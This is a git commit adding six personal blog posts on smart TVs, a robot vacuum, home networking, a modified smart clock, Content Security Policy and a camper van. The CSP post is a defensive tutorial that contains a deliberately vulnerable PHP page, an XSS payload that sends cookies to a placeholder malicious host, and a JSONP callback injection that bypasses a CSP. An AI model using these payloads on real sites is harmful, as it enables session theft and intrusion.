jab2870/Website
1
0
Fork 0
Code Issues Pull requests Projects Releases Wiki Activity

Updates everything

Browse source
This commit is contained in:
Jonathan Hodgson 2025-07-11 19:05:04 +01:00
parent ea220efc38
commit 7cf34b3650
24 changed files with 1305 additions and 11 deletions
Download patch file Download diff file Expand all files Collapse all files

116
content/blog/017-why-cant-i-buy-a-dumb-tv.md Normal file
View file

@ -0,0 +1,116 @@
---
title: Why can't I buy a dumb TV?
date: 2022-12-31
tags:
- Privacy
description: Dumb TVs don't appear to be a thing anymore. I wonder why?
---
Our old TV is showing it's age a bit. It's an old Samsung. About 30" and 1080p.
It works fine, but certainly isn't what you'd call modern. I think it dates from
around 2010.
I thought I'd look and see how much it would cost to replace it -- allowing me to
use it as a monitor. I spend the majority of my time in a terminal, I don't game
and as such 4k, high refresh rate, wide screen monitors are of little interest
to me. What is of interest to me is how many terminal windows I can tile and
still use.
Anyway, I went to various sites and navigated to TVs. What I found surprised me
a little: no dumb TVs. None at all. There were smart, 4k 55" TVs for under £400,
but nothing without "smart features".
Most people assume that if I don't like something, it's because of privacy
concerns or similar. While this is partly true for TVs, it's not my main
dislike.
Smart TVs need to be maintained by the manufacturer when it is in their interest
not to do so. Think about software updates. Is Samsung / LG / Sony / Philips going to
be putting updates out for your TV in 10 or 15 years? If you think they might,
take a look at how phones have gone. I'll use Samsung as an example: they offer
3 years worth of feature updates and 4 years worth of security updates -- that is
for their flagships. Lower end phones won't even get that. This means that after
4 years, your Samsung flagship phone will not be patched for security issues.
Why would they do any different for TVs? Many smart TVs even run Android -- a
variation on the system used on most smartphones.
That just relates to the manufacturer maintaining the device. Let alone the apps
who can also [decide to stop supporting the TV](https://9to5google.com/2019/07/26/sony-tv-amazon-prime-video-september/).
It is bad enough spending hundreds (or thousands) of pounds on a phone every few
years, I don't want to do the same for a TV.
"What about apps?", you might ask. This is a non issue. I can buy a 4k fire
stick for less than £50. That is without offers. I've seen them sub-£30 on prime
day. If that only lasts 3 years, I can swap that for a new one at the time,
rather than swapping out my whole TV. I don't love the idea of replacing a set
top box every few years, but I like that idea far more than replacing a whole
TV.
Modern versions of HDMI will happily support your HDR, single remote and
surround sound needs.
So, planned obsolescence is one reason, but I don't think it is the whole story.
I'm sure it won't come as a surprise to anyone reading this blog that data
collection is a huge business these days. Targeting advertising allows companies
to charge exuberant prices for well placed ads. The amount they can charge
correlates nicely with the amount of data they can collect. It is no coincidence
that the largest advertising companies (Google and ~~Facebook~~ Meta) are also
two of the worst offenders for hoarding information.
TV manufacturers realised that they can make more money selling adverts than
they can selling TVs. The more TVs they sell, the more they can charge for
advertising. This is not just me and my tin foil hat. Vizio went public a year
or so ago and, as a result, had to publish their financials. They made over
[twice as much money selling ads as they made from TV sales](https://www.theverge.com/2021/11/10/22773073/vizio-acr-advertising-inscape-data-privacy-q3-2021).
This isn't the post to go into why I think it is important to protect your data.
If you're reading my blog, you probably already have some idea. However, it
seems that just as most of our phones, smart speakers and watches spy on us, our
TVs are trying to do the same. Maybe you don't care if big companies know what
you're watching. That is your decision, but it is a decision you should make --
not one that you should be compelled into.
It seems clear to me that planned obsolescence isn't the only factor at play
here. Sure, they want to sell you a TV every few years, but they also want to
harvest as much data as possible in order to sell ads. I don't want this.
The question then becomes, what can we do about it? Unfortunately, I haven't
found a good answer to this but here are some thoughts.
The first, and perhaps most obvious answer, is to buy a smart TV and just not
connect it to the network. With this you get the advantage of (comparably) cheap
units, and don't have the risk of data harvesting. A slight variation on this
might be isolating the TV or blocking access via a firewall rule. This doesn't,
however, mitigate the issue of security updates. Additionally, I'm told that
many TVs will either not work at all, or continuously prompt you to connect them
to the internet. I recently tried to use a Fire TV stick on a network without
internet connectivity, in order to watch content stored on a local server with
Jellyfin. The process was a long way from ideal. The home screen (where you
would normally select the app such as Jellyfin) was replaced entirely with a
network error and a prompt to go to network settings. Even apps that don't
require an internet connection were unavailable.
It was possible to launch Jellyfin by going `Settings` -> `Applications` ->
`Manage Installed Applications` -> `Jellyfin` -> `Launch Application`, but that
is not a process I want to make every time I turn on the TV, and certainly not a
solution that would get wife-approval. I have no idea if I would have similar
issues with other devices, and buying a smart TV to test that is not
particularly palatable.
Another option might be using a non-tv monitor as a TV. You can buy large
computer monitors or displays meant for digital signage. Computer monitors of
this size [are
expensive](https://www.amazon.co.uk/Philips-558M1RY-Monitor-Ambiglow-FreeSync/dp/B086X4J9KG/ref=sr_1_3?keywords=65+inch+monitor+4k&qid=1672490924&sprefix=65+inch+monitor%2Caps%2C292&sr=8-3).
Digital signage signs are also expensive, but do tend to come with the advantage
that they are designed to be on all the time. Although I couldn't find much in
the way of data, I suspect this would mean they would last longer. However,
again, they are a lot more expensive than a consumer-grade smart TV.
My plan is to do some more research and try and find a smart tv that can be used
without constant nags when not connected to the internet. If any of you know of
such a device, or have any other ideas, let me know in the comments below.

71
content/blog/018-i-got-a-robot-vacuum.md Normal file
View file

@ -0,0 +1,71 @@
---
title: I Got a Robot Vacuum
date: 2022-12-31
tags:
- Privacy
- Home Assistant
description: I recently bought a Robot vacuum. I have been amazed how good it is.
---
So, you have probably seen or heard about robot vacuums. I had, although
honestly thought they were a bit of a gimmick. However, a few people I know have
them and sung their praises so I thought I'd see what the fuss was about.
I did some research and settled on the [Dreame L10 Pro](https://amzn.to/3GacxLz)
([Non-Associates
link](https://www.amazon.co.uk/Dreame-Dual-Line-Navigation-Multi-Level-Compatible/dp/B09YQ3VF3J/?th=1)).
This was in no small part because it is known to work with
[Valetudo](https://valetudo.cloud/) which allows for fully local control of the
robot. As well as a very usable web interface, it also provides MQTT control
which I use for [Home Assistant](/tag/home_assistant/) control.
It is fair to say that my expectations have been shattered by this device. I
expected it to do a reasonable job, but that I would probably have to do a
"proper" hoover once a week or so. That has not been the case. I have not had to
manually hoover the floors at all since setting it up. I have been especially
surprised by this as we have a dog who malts.
I have the vacuum set to vacuum our daytime living areas (lounge, kitchen, hall,
study) every morning at 1am. I did not expect the quality of life improvement
that we got from waking up every morning to a vacuumed house. Our bedroom is
then vacuumed during the day while we work. Apart from emptying the vacuum's
dustbin, this is entirely automatic.
The vacuum I have has a detachable cloth and water tank that it can drag behind
it and keep wet. I mostly got the device for its vacuum capabilities. However,
the addition of the mop is nice. This, too, exceeded my expectations; although
not to the same extent as the vacuum. It is nice to have, but I wouldn't buy
this particular robot for its mopping capabilities. We tend to attach this mop
and manually instruct the vacuum to mop various rooms when we go out.
## Any Cons?
Although this device has been an overwhelming positive in our life, it may not
be for everyone.
We have hard floors throughout our flat. This obviously makes vacuuming and
mopping easier for the robot. We do have a thick rug which it can struggle with
a little. However, I have taken the robot to our parents' houses who have carpet
and it has tackled even quite thick carpets without issue. If you have a lot of
very thick rugs, you may want to do a bit more research into robots that can
deal with them.
Also, the dustbin in the vacuum is quite small. I tend to empty it every other
day. Paying more can get you features such as auto-emptying dustbins which the
robot I got doesn't have.
We live in a flat, so we don't have stairs to contend with. We are due to move
very soon into a house. My long term plan is to buy a second robot, in order to
have one up stairs and one downstairs. This (obviously) makes a fully automated
vacuuming setup significantly more expensive. However, the fact that I am
planning this hopefully demonstrates how happy I am with this vacuum.
## Home Assistant
As mentioned, Valetudo allows me to control my robot entirely locally. My home
automation platform of choice is Home Assistant which is [supported by
Valetudo](https://valetudo.cloud/pages/integrations/home-assistant-integration.html).
With my smart light switches, it allows me to do things like push and hold the
light switch in order to instruct the vacuum to come and hoover the room I'm in.
It can also stop the vacuum from vacuuming every day while we are on holiday.

162
content/blog/019-my-new-home-network.md Normal file
View file

@ -0,0 +1,162 @@
---
title: My New Home - Network
date: 2023-02-08
tags:
- Privacy
- My New Home
description: >
I recently bought a new House. In this post, I discuss my network setup as
part of a series of posts about the setup.
---
So, we have finally moved into our new home. The buying process took far too
long, I am sick to death of dealing with solicitors, but we are now in. I hope
this will become a series of blog posts in which I detail the setup process.
This particular post will be the network.
My initial intention had been to buy some land and build a house. However, the
process of doing so in the UK was ... annoying, so instead we went for a new
build. We found the property early enough in the build process that we were able
to make various requests. One of which was for the electrician to run Cat-6
ethernet cable throughout the house before the walls were plastered. The cables
all run into our under-stairs cupboard which I managed to convince my wife to
give me as a server room.
The majority of our rooms have 2 ethernet sockets in opposite corners. Our
lounge has 4, one in each corner. Our hall and landing both have celling mounted
ports for access points. I think this is probably more than we need, but at the
time we didn't know how we'd lay the rooms out, so we put in more than we
thought we'd need. I think this was a good choice. Running ethernet is much
easier when you don't have plaster to contend with. And they are just sockets on
the walls -- they are no uglier than mains, telephone or coax sockets.
## Network Gear
In terms of the network gear, I decided to take the plunge and try TP-Links
Omada line. I think it is fair to say that in the pro-sumer arena, Ubiquity are
the most popular. However, they are also expensive. I watched a lot of YouTube
and decided that TP Link's product catered for my needs.
I bought:
* [A Router / firewall](https://amzn.to/3HwPACO) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08SWR1K56/))
* [A Switch](https://amzn.to/3I1rB07) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08W4PM24H/))
* [An Access Point](https://amzn.to/3RCFkxw) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B09ZF7HPFB/))
I won't go into too much detail on the individual devices I got as copying me is
a pretty bad idea. You want to make the decision based on the size of your
network, the speeds you need and the sorts of devices you want to attach.
## Network Configuration
I run the TP Link Omada Controller in a Docker container on my home server. I
have had no issues with it at all so far.
In terms of the software itself, I would say that it's not quite on a par with
Ubiquity's product, however, it is more than sufficient for my needs and I would
think more than sufficient for most home users and small / medium businesses.
The only area I found it to be a little lacking was the firewall configuration.
However, before I explain that, it would be helpful for me to explain the VLANs
I have on my network. In case you don't know, a VLAN is a virtual network. It is
useful for categorising and segregating devices. I have seen many examples
across the internet of people who setup tens of VLANs for their home network.
However, I think any security gains you may get from that are outweighed by the
added complexity maintaining it. I have opted for two VLANs.
My first VLAN is for trusted devices. Trusted devices are my computers, my
wife's computers, our phones and my server. These are able to communicate
with each other and the internet.
My second VLAN is for smart devices. These are devices that have no business
talking to each other or the internet. The only device they can communicate with
is my server running Home Assistant, an NTP server and a DNS server.
This can all be achieved easily with the Omada software. Where it is lacking is
in its inability to set up stateful firewall rules. I would like to configure
the firewall so that devices on my trusted network can communicate with devices
on the smart VLAN, and the smart devices should be able to reply. Meaning, from
my laptop, I cannot SSH into [my vacuum](/blog/i-got-a-robot-vacuum/) because
that requires 2 way communication. There is talk [on
Reddit](https://libreddit.kavin.rocks/r/HomeNetworking/comments/mrxsbg/tplink_omada_switch_acls_arent_stateful/)
that future firmware may support this, but at the moment it doesn't. I have got
around this by using my server as a jump box to SSH from as smart devices are
able to connect to this, although I'd prefer a stateful firewall solution.
I am also not able to force all DNS requests to my DNS server. On some router /
firewall solutions, you can force all outbound traffic on port 53 (DNS) to a
particular device. I have to rely on devices honouring the server specified via
DHCP. However, they seem to be doing this. They are unable to communicate with
any other servers so even if they are only honouring my choices because they
have no choice, I don't really care.
## NTP
One of the issues I overlooked when planning my network setup was that of the
Network Time Protocol (NTP). I have Chrony running on my server, but many
devices don't allow you to specify an NTP server. Instead, they just silently
fail, and leave you scratching your head whilst trying to correlate times in log
files. A particularly annoying case of this had a device default to a date in
January 2022. Whilst debugging an issue, it was January 2023 and I completely
missed the fact that it was a year out for far too long.
It should be possible to configure an NTP server via DHCP. However, the Omada
software doesn't [appear to support
it](https://community.tp-link.com/en/business/forum/topic/256680). Eventually, I
might allow my Pi Hole to manage IP assignment which would allow me to configure
the appropriate DHCP options, although that would still be reliant on devices
obeying it.
For now, I have pointed the domains I saw being used at my server, which appears
to have worked.
## Network Connection
Another issue I came across is that some mobile apps for self hosted programs
don't work without an internet connection. I [raised an
issue](https://github.com/advplyr/audiobookshelf-app/issues/566) for
Audiobookshelf. The owner responded quickly and after a few screenshots
acknowledged the bug. This is not supposed to be a knock on the app -- I have
been hugely impressed by the speed of responses I've had from the team who work
on it. It is instead supposed to highlight the fact that many tools are not
tested against the sort of non-standard setup I have here. As a result, I am
going to run into issues that I wasn't expecting.
In the case of Audiobookshelf, it looks like one of its libraries checks for
internet connectivity rather than network connectivity. After checking my
pihole's logs, it turns out that Android devices make regular (unencrypted)
requests to <http://connectivitycheck.gstatic.com>. This is used to identify
captive portals as well as verify internet connectivity. Fortunately for me,
being unencrypted, I can host a simple webserver and point that domain at it on
my network. So that's what I did. The relevant NGINX config is below:
```nginx
server {
listen 80;
listen [::]:80;
server_name connectivitycheck.gstatic.com;
location / {
return 204;
}
}
```
After this, the app started working as expected.
## WPS
WPS is a method of connecting to a network without having to enter a password.
It generally involves pushing a button on your access point and a button on your
phone / device then "magically" the device is on your network. This method of
connection has been shown to have several security weaknesses. Many modern
solutions, including Omada and Ubiquiti have stopped providing this as an
option.
I approve of this decision, it is something I would have disabled if it had been
present. However, my printer has no other way of connecting to the network. No
ethernet and no way to enter a password. I think I'll probably have to dig out
an old router that does support WPS and hope that after connecting, the printer
will have a web interface that allows me to change the network configuration. If
not, I may have to just plug a small SBC into it and run a cups server on that.

209
content/blog/020-my-new-home-alarm-clock.md Normal file
View file

@ -0,0 +1,209 @@
---
title: My New Home - Alarm Clock
date: 2023-02-26
tags:
- Privacy
- My New Home
- Home Assistant
description: >
Part 2 of my new home setup. I discuss a Lenovo clock I got.
---
I recently picked up a [Lenovo Clock
2](https://www.lenovo.com/gb/en/p/smart-devices/smart-home/smart-home-series/lenovo-smart-clock-2/wmd00000485)
on offer. I got it for around £25. I knew it ran Android and thought
that for that price, it was worth picking one up to mess with.
After a couple of searches, I found a guide to installing other android apps on
it.
<https://forum.xda-developers.com/t/guide-installing-android-apps-on-the-lenovo-smart-clock-2.4393271/>
Once I'd installed a custom launcher, I was able to get into the android
settings and start disabling apps. I disabled the vast majority of them although
I was unable to disable the Google Assistant app. At the time of writing, there
doesn't appear to be a reliable root method for the device. There is also no USB
interface so even an adb shell was unachievable.
## Dealing with the microphones
For me to have a device like this plugged in, in my house, I want to be
absolutely certain that it isn't sending any data back to its Google mothership.
The device has a toggle on the back that switches the microphone off. This is a
software toggle. This has 2 issues. Firstly, it could conceivably be overwritten
in software. Second, it puts an icon on the screen to tell you that it's muted.
This takes up a significant part of an already small screen. So, I took the
device apart to see if the microphones were removable.
I should probably make the point here that the following procedure will void any
warranties you may have on the device. Also, this is not advice, I am not
responsible if you break it, or hurt yourself or anything else.
Disassembly was surprisingly easy. After unsticking the non-slip
ring on the bottom, there were four screws to undo -- one in each corner. After
doing this, the bottom of the device can be prized off. There are a few plastic
clips and a ribbon cable to be aware of, but if you have ever disasembed
anything before, it should be quite easy.
![Bottom off, screen screws circled](/assets/lenovo-clock/screen-screws.jpg)
This then exposes a couple of additional screws which hold the screen in place,
highlighted above. The screen can then be removed, exposing a circuit board
containing the microphones and the ambient light sensor.
![Screen removed, microphones exposed](/assets/lenovo-clock/microphone-board.jpg)
This can be removed. It is friction fit and there is another ribbon cable.
Remove the ribbon cable and the microphones and sensor can be removed. Put
everything back together and plug it in - there you go. You have a device that
**cannot** listen to you.
This may be overkill, this device is going on a VLAN that doesn't have internet
access so there should be no way for it to talk back anyway. However, defence in
depth is the best option in my opinion. If I connect it to the wrong network or
misconfigure my firewall, I don't want it sending any information back to
anyone.
## Home Assistant Setup
Next step, for me, was to set it up as a Home Assistant screen. I was able to
install [WallPanel](https://github.com/thecowan/wallpanel-android) which is a
browser that can be controlled remotely via an HTTP API or MQTT. It is similar
to the concept of [FullyKioskBrowser](https://www.fully-kiosk.com/). It is open
source though and doesn't lock features behind a paywall. I've used
FullyKioskBrowser before, and it is a very competent piece of software, but I
felt like trying something new.
I created a simple dashboard in Home Assistant, and set the start URL for
wallpanel to that dashboard. The screen is small, so you don't really want lots
of information on there. I have a clock, an alarm clock toggle, a radio
station selection (more on that later) and a few buttons.
The next part of the setup was [Browser
Mod](https://github.com/thomasloven/hass-browser_mod). This allows you to
control a browser window through Home Assistant, adding the ability to use it as
a media player or hide the navigation elements that are usually present. This
allowed me to play (local) audio on the clock. It also allows me to remove the
sidebar and top bar on the device to reclaim a little screen space.
### Radio
One of the side effects of not allowing the clock to access the internet means
it can't play internet radio (hopefully that isn't a surprise to anyone).
However, I like to be woken up to the radio. It is probably possible to add some
radio IP addresses to a whitelist. However, to make my life easier, I decided to
proxy any radio stations through my home server, which does have internet
access and the smart clock can communicate with.
For the most part this was pretty simple. I found stream URLs for a couple of
radio stations. Here is the nginx configuration for Classic FM and Absolute
Radio.
```nginx
perl_set $unix_timestamp 'sub {
time();
}';
server {
listen 443 ssl;
listen [::]:443 ssl;
ssl_certificate /etc/nginx/certs/fullchain1.pem;
ssl_certificate_key /etc/nginx/certs/privkey1.pem;
server_name radio.my.domain
include /etc/nginx/conf.d/acl.inc;
location /classicfm {
proxy_pass http://icecast.thisisdax.com/ClassicFMMP3;
}
location /absolute {
resolver 1.1.1.1;
proxy_pass http://edge-bauerabsolute-05-gos2.sharp-stream.com/absoluteradiohigh.aac?aw_0_1st.skey=${unix_timestamp}&aw_0_1st.playerid=BMUK_RPi;
}
}
```
I'm sure you can see how this can be extended for more stations. The only thing
that may not be obvious is the `unix_timestamp` variable in the absolute radio
url. I don't know why it is necessary, but for some reason it is, so I define a
variable in the `perl_set` block at the top.
So, with this, I can run
```bash
mpv https://radio.my.domain/classicfm
```
And ClassicFM will play. With BrowserMod set up for the device, I can then run
the service:
```yaml
service: media_player.play_media
target:
entity_id: media_player.alarm_clock
data:
media_content_type: music
media_content_id: "https://radio.my.domain/classicfm"
```
I would like to be able to add these URLs to the media library, however I
haven't yet found a way to do that. If anyone knows of a way, please let me
know. However, for now I created a text helper with the following:
* Off
* Absolute Radio
* Classic FM
I then created an automation:
```yaml
- alias: Clock Radio
trigger:
- platform: state
entity_id:
- input_select.bedroom_radio
condition: []
action:
- if:
- condition: state
entity_id: input_select.radio
state: Classic FM
then:
- service: media_player.play_media
data:
media_content_id: https://radio.hodgson.one/classicfm
media_content_type: music
target:
entity_id: media_player.alarm_clock
- if:
- condition: state
entity_id: input_select.radio
state: Absolute Radio
then:
- service: media_player.play_media
data:
media_content_id: https://radio.hodgson.one/absolute
media_content_type: music
target:
entity_id: media_player.alarm_clock
- if:
- condition: state
entity_id: input_select.radio
state: 'Off'
then:
- service: media_player.media_stop
data: {}
target:
entity_id: media_player.alarm_clock
mode: single
```
The last step is an automation for my alarm clock. It simply sets the input
select we set up to ClassicFM. This then plays on the speaker.
The result is below:
![Finished Clock](../../assets/lenovo-clock/screenshot.png)

360
content/blog/021-csp.md Normal file
View file

@ -0,0 +1,360 @@
---
title: Setting a good Content Security Policy
date: 2024-08-22
tags:
- Security
- Websites
description: >
Setting a good CSP can be hard. Here I go through what it is, and how to set
it up well.
---
The Content Security Policy (CSP) is a powerful security feature that helps
protect your website from cross-site scripting (XSS) attacks and other types of
code injection vulnerabilities. There are some directives that do other things,
but the bulk of this blog post will cover using the `fetch-directives`, or the
elements of the CSP that allow you to specify a allow-list of approved sources
from which resources This helps prevent malicious code from being executed on
your site.
To implement CSP, you need to set the Content-Security-Policy HTTP header on
your web server. Here's an example of what a basic CSP header might look like:
```
Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com
```
Let's break down the different directives in this example:
- `default-src 'self'`: This sets the default source for all resource types to the same origin (i.e., your own website). This is a good baseline to start with.
- `script-src 'self' https://example.com`: This specifies that scripts can only be loaded from your own site (`'self'`) and the `https://example.com` domain. This helps prevent the execution of any unauthorized scripts.
It is worth noting that default-src applies to all source types that haven't
been explicitly specified. Any sources that are explicitly specified overwrite
then default-src, they are not added to it.
Consider the following:
```
Content-Security-Policy: default-src 'self'; script-src https://example.com
```
This will not allow scripts to sourced from the current origin, despite `'self'`
being in the `default-src` directive.
You can further customize the CSP header to suit your website's specific needs.
For example, you might want to allow images to be loaded from a content delivery
network (CDN), or allow fonts from a third-party font provider. Here's an
example of a more comprehensive CSP header:
```
Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com; style-src 'self' https://cdn.example.com; img-src 'self' https://cdn.example.com; font-src 'self' https://fonts.gstatic.com
```
In this example, we've added directives for styles, images, and fonts, allowing
them to be loaded from specific approved sources.
It's important to note that implementing CSP is an iterative process. You'll
likely need to adjust your policy as you add new features and functionality to
your website. A good approach is to start with a strict policy and gradually
loosen it as needed, while keeping security as the top priority.
Whilst testing, it may be useful to use the
[content-security-policy-report-only](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only)
header. Whilst it doesn't provide any protection, it also won't break an
existing site as it only reports report violations, rather than blocking them.
## Why Bother
So, we have an idea of how to set a CSP, but not why we may want to. The main
reason to have a strong CSP set is to protect against injection attacks. The
most common of these is cross-site-scripting, where JavaScript is injected;
although other types do exist when injecting malicious css (style-injection), or
images (image-injection). The example below explains one way in which script
injection, or cross-site-scripting, is bad.
Take the following simple PHP search page:
```php
<!DOCTYPE html>
<html>
<head>
<title>Vulnerable Search Page</title>
</head>
<body>
<h1>Search Our Website</h1>
<form method="GET" action="/search.php">
Search: <input type="text" name="search">
<input type="submit" name="submit" value="Search">
</form>
<?php
if(isset($_GET['search'])) {
echo "<h2>You searched for: " . $_GET['search'] . "</h2>";
}
//Some logic to display search results
?>
</body>
</html>
```
The important factor here is that the users search query (`$_GET['search']`) is
output verbatim, without encoding or sanitising it.
If I perform a search for `<script>alert(1);</script>`, the following h2 tag will be sent to the browser:
```
<h2>You searched for: <script>alert(1);</script></h2>
```
The browser will see that, and interpret the script tag as a script it should
execute. `alert(1)` is a relatively benign function that we often use to
demonstrate the issue exists, without causing significant issues to the site.
However, now imagine changing `alert(1)` for
`fetch('https://malicious-site.com?c=' + document.cookie)`.
Now my cookies have been sent to a malicious site for the owner to do with as
they please.
The content-security-policy can be use to add a layer of protection here. When
set strictly, the browser can "know" that the script tag in the h1 tag isn't on
a pre-approved list, so the browser won't execute it.
## Potential Mistakes
So, now we know why you might want a CSP, and how to set one, we'll look at some
of the most common mistakes I see people make.
### `'unsafe-inline'` source
This source is very frequently added to a CSP, without realising it severely
limits the protection that it can offer. Most online generators will add it as,
in their current setup, most sites use inline resources. An inline resource is,
as the name suggests, most script or style resources that are not external.
So,
```html
<script>console.log("Inline");</script>
<img src="something.jpg" onclick="console.log('Also Inline')" />
<script src="/not-inline.js"></script>
<style>
body{
background-color: red; /*inline*/
}
</style>
<img style="background-color: red; /*also inline*/" />
<link rel="stylesheet" href="/not-inline.css" />
```
The problem here is that, more often than not, inline JS is the easiest way to
achieve XSS. The search example we used earlier added an inline script tag, so
a CSP with unsafe-inline would not have prevented it from executing.
There are a number of better options here. First is externalising scripts. So,
moving inline JS into an external file and adding it to the allow-list.
If that isn't possible, or practical, another option is to use the special
`<hashtype>-<hash>` sources, or `nonce-<nonce>` sources. These allow you to add
specific inline scripts to the allow-list, without allowing all inline scripts.
Just make sure not to fall into the [potential mistakes with nonce
sources](#nonce-source).
### `'unsafe-eval'` source
The unsafe-eval source is only relevant for JavaScript, and allows scripts to
run `eval()`, and a couple of other similar functions. The most common use for
eval I've seen is when targeting older JS environments that not have native
JSON support as an alternative to `JSON.parse()`.
So, consider the following:
```js
const jsonString = document.getElementById('someTextArea').value;
const jsonObject = eval(jsonString2 );
```
If the contents of the text area were:
```json
{
"name": "Jane Doe",
"age": 25
}
```
then:
```
console.log(jsonObject.name); // Output: "Jane Doe"
```
However, if the contents of the text area were `alert(1)`, then we are in the
situation again whereby unsafe JavaScript is being executed. Unfortunately,
there are a lot of different uses of eval, so a "fix" for all of them is
unlikely. However, most modern frameworks do not need to use eval, so disabling
it is preferable if possible.
### Nonce source
The nonce source allows site maintainers to allow some inline sources to be
included. We've been using JavaScript as examples, so I will continue to do so,
but note that this is also relevant for CSS.
```
Content-Security-Policy: script-src 'nonce-uph5Fai4'
```
```
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<script nonce="uph5Fai4">
console.log("This will run");
</script>
<script>
console.log("This won't");
</script>
</head>
<body>
<h1>Our Website</h1>
</body>
</html>
```
For the nonce source to be effective, it must be unpractical for malicious actor
to guess the nonce. In practice, this generally means using a long and random
string of characters for each response. The nonce should not be re-used. If a
malicious actor can guess what a nonce is, then they can simply add the
attribute to their injected payload.
### JSONP Sources
JSONP (JSON with Padding) is a technique used to bypass the same-origin policy,
which is a security feature implemented by web browsers to prevent a web page
from making requests to a different domain than the one that served the web
page.
The way JSONP works is as follows:
1. The client-side code defines a function, to processes JSON data.
1. A `<script>` tag is created with its `src` attribute to a URL that returns a JSON response, with the name of the previously defined function specified.
2. The server-side code wraps the JSON response in a function call, with the function name provided.
Here's an example:
Client-side HTML:
```html
<script>
function handleResponse(data) {
console.log(data);
}
</script>
<script src="https://example.com/data?callback=handleResponse"></script>
```
The response to that data script would look something like:
```javascript
handleResponse({
"name": "John Doe",
"age": 30
});
```
JSONP was a popular technique in the past, as it allowed developers to make
cross-domain requests without running into the same-origin policy.
However, if a user is able to inject a script tag into a document, and a CDN
that is known to host JSONP endpoints is on the allow-list, they could include
something like
```html
<script src="https://example.com/data?callback=alert(1);handleResponse"></script>
```
Most implementations will then return the following:
```javascript
alert(1);handleResponse({
"name": "John Doe",
"age": 30
});
```
JSONP is now generally discouraged, in favour of
[CORS](https://jakearchibald.com/2021/cors/), which allows site owners to
explicitly allow some resources to be requested across origins. However, note
that many CDNs host JSONP endpoints, so even if your site doesn't use them,
allowing a domain that hosts them is enough to provide a CSP bypass in many
situations. The CSP does allow sub directories or even specific files to be
added to the allow-list, so if unsure about whether a CDN provides JSONP
endpoints, you may wish to explicitly allow a specific file on the CDN, rather
than all files.
For example:
```
Content-Security-Policy: script-src http://example.com/file.js;
```
as opposed to
```
Content-Security-Policy: script-src http://example.com/;
```
### Domains Which Allow Uploads
When you include a domain in your CSP, you're essentially giving control of your
website's security to that platform and all the developers who publish code on
it. Not only does this potentially introduce [supply chain
attacks](https://thehackernews.com/2024/07/polyfillio-attack-impacts-over-380000.html),
many CDNs also allow public submission. Unpkg, for instance, is a popular CDN
that hosts everything on NPM. All you need to submit code to it is a free NPM
account. If a CSP includes unpkg, or one of the many similar services, in their
CSP; anyone can submit code that the CSP will allow to run.
#### Self source
It is worth noting that the `'self'` keyword can introduce a similar issue.
The `'self'` source is a shortcut to allow sources from
the current [origin](https://developer.mozilla.org/en-US/docs/Glossary/Origin).
The difference between origin and site has been discussed [elsewhere in more
detail](https://jakearchibald.com/2021/cors/#origins-vs-sites), but briefly, an
origin is defined by scheme (protocol), hostname (domain), and port of the url.
Sub domains are a different origin, although often the same same site.
```
https://example.jonathanh.co.uk:443/something/cool
│ │
└────────────Origin───────────────┘
https://example.jonathanh.co.uk:443/something/cool
│ │
└────Site─────┘
```
Normally, including `'self'` is safe, although care should be taken if you allow
users of your site to upload content, and that content is accessible on the same
origin. If so, a user could potentially upload a malicious file and bypass the
CSP as the file is available under the `'self'` domain.
### Other Permissive Sources
The following are considered permissive. I won't go into too much detail for
each, but ideally you should avoid using:
* `https:` - Any source that is hosted on an encrypted server. A malicious actor
can very easily spin up a server with a valid certificate
* `data:` - Any source that can be loaded via a data scheme. In most cases, this
just involves base64 encoding a payload.

158
content/blog/022-new-van.md Normal file
View file

@ -0,0 +1,158 @@
---
title: I Got a Van
date: 2024-08-24
tags:
- Van Build
description: >
I've bought a van. I'm planning on converting it to a camper and documenting
the process here.
---
So, as you've probably gathered from the title, I've bought a van. Or, at least,
reserved it, I actually pick it up in a couple of weeks. It's a 2019 Fiat Ducato
L4H2 which means it's long and quite tall.
There will be 3 of us using the van. Me, my wife, and our lurcher, Rumple. One
of the biggest requirements we have is that the van is both comfortable and safe
for him to live and travel in. We have some ideas and thoughts around this, but
you will hopefully see what that looks like in future posts.
My plan is to convert this van into a camper. This first post is mainly a brain
dump, for me as much as anyone else, about my current plans. Many will change,
some may be scrapped all together.
We are not planning on living in the van. However, it would be nice if we can go
away for prolonged trips in it. Maybe a month or 6 weeks at a time. Obviously,
we will use it for shorter weekend breaks, but we don't want to be limited
to a week or so at a time. As a result, we should be able to work from the van.
We are in a very fortunate position that my wife and I both work from home for
the vast majority of the time. As a result, as long as we have a reasonable
internet connection and electricity, we can both work.
Obviously, if we are both working off laptops, and potentially with additional
monitors, or power consumption is likely to be on the higher end. The electrical
system in the van will definitely be a separate blog post, but at the moment, it
looks like we'll be going for [LiFePO_4_
batteries](https://en.wikipedia.org/wiki/Lithium_iron_phosphate_battery).
Hopefully with 2 or 3 solar panels on the roof, as well as DC to DC charging so
we can charge the batteries whilst driving. We will probably also add a shore
power hookup, but that may come further down the line.
For the internet side of things, I plan to mount a 5G antenna on the roof.
Despite the name, it should pick up all the Gs. I will be on the look out for a
router that I can plug such an antenna into, preferably one that supports the
something like OpenWRT.
This brings me quite nicely onto my plans for the Van's network. I hate WiFi. It
will be available in the van for all my ESP boards (more on that later), but if
I'm working on my laptop, I want it plugged in with a cable. So, I will be
running Ethernet in my van, as well as power and water and whatever else I need
to make it into a camper. I won't be going overboard like I did in my house -
weight is a consideration in a van and cables are heavy; but I will be running
it to (as a minimum) the office space for me and my wife, and my van server.
Van server? Yes, you heard (read?) that right. I'll be having a server in my
van. I am not sure yet if I'll be going down the Pi route, or something like a
Nuc, but I will be having a low-ish powered server in the van. This will run
things like [Home Assistant](https://www.home-assistant.io/) (more on that in a
bit), [PiHole](https://pi-hole.net/),
[AudioBookShelf](https://www.audiobookshelf.org/),
[WireGuard](https://www.wireguard.com/) and maybe a few other things.
Importantly, I won't be using it to run things that need a lot of power - think
Jellyfin, Ollama and such.
Things might change. Obviously, with a server that can go on motorways, spinning
hard drives are a no-go. So storage is likely to have to be solid state for
everything. As a result, I won't really be using this for a NAS. Storage of
photos and videos will still go to my home server in my house. But things like
audiobooks and podcasts that I am likely to want to listen to on the go will be
stored on the local network.
